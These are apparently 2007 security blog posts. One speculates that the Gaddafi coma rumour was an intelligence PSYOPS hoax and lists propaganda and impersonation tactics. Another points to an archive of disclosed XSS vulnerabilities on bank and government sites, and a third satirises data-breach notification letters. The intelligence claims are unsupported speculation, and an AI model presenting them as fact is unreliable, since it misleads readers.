Capitalism has the power to undermine any regime except perhaps one whose foundations are purely religious such as with Islam, therefore dirty tricks like the ones fabricating evidence and making the average Iranian perceive its current rulers as a corrupt puppets of behind a power-driven vision, seems to be a way of destabilizing the regime. Another recent example of an unamed intelligence agency's PSYOPS team aiming to a achieve a disorted media-echo by distributing false rumors and relying on that basis that there's truth in every rumour, was that of Muammar Gaddafi's coma speculations that quickly spread around the world. But what was the purpose of this hoax? Let's clarify - to achieve a media echo effect abusing the mainstream media's major weakness in respect to always trying to be the first to spread a ground breaking event. What did the colonel do once he found out he was in a come? Instead of ignoring, he fell victim into an even more well-thought of trap, and responded that the'll sue the news agency that came up with the hoax, thus, achieving an even more sucessful media echo effect. If you want to destroy a regime, you destroy it from inside-to-outside, not the other way around and perhaps the key objective of this PSYOPS was to help the regime's citizen's envision a future without their leader, even for a few hours before the fact is once again on the front pages. Ingenious intelligence thinking.

PSYOPS and BLACKOPS intersect and these are among the many practial examples I pointed out in a previous post :

- your web sites spread messages of your enemies
- sms messages and your voice mail say you're about to lose the war
- your fancy military email account is inaccessible due to info-warriors utilizing the power of the masses, thus script kiddies to distract the attention
- you gain participation, thus support
- you feel like Johnny Mnemonic taking the elevator to pick up the 320 GB of R&D data when a guerilla info-warrior appears on the screen and wakes you up on your current stage of brainwashing
- starting from the basics that the only way to ruin a socialist type of government is to introduce its citizens to the joys of capitalism -- it always works
- hacktivism - traffic acquisition plus undermining confidence
- propaganda - North Korea is quite experienced
- self-serving news items, commissioned ones
- achieving Internet echo as a primary objective
- introducing biased exclusiveness
- stating primary objectives as facts that have already happened
- impersonation

Monday, June 04, 2007

g0t XSSed?

Following previous posts on XSSing The Planet and XSS Vulnerabilities in E-banking Sites, here's a full disclosure project that's basically categorizing user-submitted XSS vulnerabilities by pagerank/government/public entity, with mirrored XSSed pages.

Even a .secured TLD name is nothing more than a false feeling of security with phishers still loading content from E-banking providers' sites, and actively exploiting XSS vulnerabilities to make their scams use the bank's site. Therefore from a business development perspective you ought to realize that overperforming in a developing market segment, is sometimes more profitable than being a pioneer with an idea the market's not willing to anticipate for the time being -- perhaps for the best.

Data Breach Sample Letters of Notification

Dear customer, to ensure your satisfaction with our quality services we're notifying you that our inability to protect your sensitive data has resulted in its leakage on the World Wide Web thus, stay tuned for possible identity theft and spending the next couple of years explaining how it wasn’t you who bought that luxurious yacht your bank wants you to pay for. By the time our stolen laptops get connected to the Internet -- which we doubt anyway -- they will phone back helping us locate them which doesn’t mean we didn’t breach the confidentiality of your personal information, and are just trying to be socially responsible in the time of notification.

Sincerely,
Your favorite and customer-friendly breached retailer

Perhaps the most comprehensive archive of scanned data breach letters of notification on U.S based companies, I've come across to so far. Well worth going through in case you wonder on what tone does a breached company use to maintain its weakened brand image, and to prevent a PR disaster.

Related posts:
To report, or not to report?
Personal Data Security Breaches - 2000/2005
A Chart of Personal Data Security Breaches 2005-2006
Getting paid for getting hacked